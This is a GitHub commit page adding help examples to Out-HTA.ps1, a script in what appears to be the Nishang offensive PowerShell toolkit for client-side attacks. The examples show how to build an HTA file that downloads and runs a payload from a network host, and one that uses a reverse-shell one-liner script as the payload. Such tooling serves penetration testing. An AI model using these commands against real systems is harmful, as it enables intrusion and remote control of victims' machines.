Skip to content

Commit

Permalink
Changes to help of Out-HTA
Browse files Browse the repository at this point in the history
  • Loading branch information
samratashok committed Oct 4, 2016
1 parent fe727aa commit 5cbae18
Showing 1 changed file with 6 additions and 0 deletions.
6 changes: 6 additions & 0 deletions Client/Out-HTA.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -43,6 +43,12 @@ PS > Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-
Use above command to pass an argument to the PowerShell script/module.
.EXAMPLE
PS > Out-HTA -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1
Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,
you must pass the parameters in the script itself.
.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang
Expand Down

0 comments on commit 5cbae18

Please sign in to comment.